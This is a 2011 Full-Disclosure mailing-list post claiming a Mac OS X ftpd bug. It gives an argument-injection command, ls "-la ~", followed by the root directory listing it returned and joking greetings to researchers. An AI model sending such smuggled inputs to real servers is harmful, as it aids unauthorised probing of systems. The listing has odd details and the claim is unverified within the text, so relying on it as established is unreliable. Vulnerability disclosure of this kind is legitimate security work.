Message-Id: <20110212162528.CDE0610E2BB@smtp.hushmail.com>
Date: Sat, 12 Feb 2011 16:25:28 +0000
From: murderingbugs@...h.ai
To: full-disclosure@...ts.grok.org.uk
Subject: Mac OS X ftpd 0day

I was having a fuzzin' session today, stumbled across this little bug.

big up 2k11, team karlkani droppin bugs like c4rl3ss k4rl

ftp> ls "-la ~"
227 Entering Passive Mode (**CENSORED)
150 Opening ASCII mode data connection for directory listing.
total 20011
drwxrwxr-t 34 0 80 1258 Aug 12 13:21 .
drwxrwxr-t 34 0 80 1258 Aug 12 13:21 ..
drwxrwxr-x 35 0 80 1190 May 11 2009 Applications
-rw-r--r-- 1 0 80 29184 Dec 23 2006 Desktop DB
-rw-r--r-- 1 0 80 194178 Dec 23 2006 Desktop DF
drwxrwxr-x 3 0 80 102 May 11 2009 Developer
drwxrwxr-x 2 501 80 68 Jul 17 2010 Groups
drwxrwxr-t 53 0 80 1802 Nov 30 2006 Library
drwxr-xr-x 1 0 0 512 Feb 11 11:54 Network
drwxrwxr-x 6 501 80 204 Nov 30 2006 Shared Items
drwxr-xr-x 4 0 0 136 May 11 2009 System
drwxrwxr-t 6 0 80 204 Nov 30 2006 Users
drwxrwxrwt 6 0 80 204 Dec 30 17:55 Volumes
drwxr-xr-x 4 0 80 136 Jun 8 2005 automount
drwxr-xr-x 48 0 0 1632 May 11 2009 bin
drwxr-xr-x 43 0 501 1462 Jun 28 2006 bru
drwxrwxr-t 2 0 80 68 Dec 8 2003 cores
dr-xr-xr-x 2 0 0 512 Dec 11 13:37 dev
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 etc -> private/etc
lrwxr-xr-x 1 0 80 9 DDec 11 13:35 mach -> ???
-r--r--r-- 1 0 80 624040 Dec 30 17:55 mach.sym
-rw-r--r-- 1 0 0 8570484 Oct 10 2007 mach_kernel
drwxr-xr-x 3 0 0 102 Nov 4 2007 opt
drwxr-xr-x 6 0 0 204 Dec 11 13:35 private
drwxr-xr-x 64 0 0 2176 May 11 2009 sbin
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2009 tmp -> private/tmp
drwxr-xr-x 10 0 0 340 May 30 2009 usr
lrwxr-xr-x 1 0 4294967294 14 Nov 30 2009 var -> private/var
226 Transfer complete.

Play with this how you like.

gre3tz 2 ma boys carnal0wnage, 0xcharlie, dan kaminsky, we like y0u, y0u kill crappy bugs, we kill good bug!
we > you!, taviso, lcamtuf, ben hawkes, everyone at the google security teletubby team

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/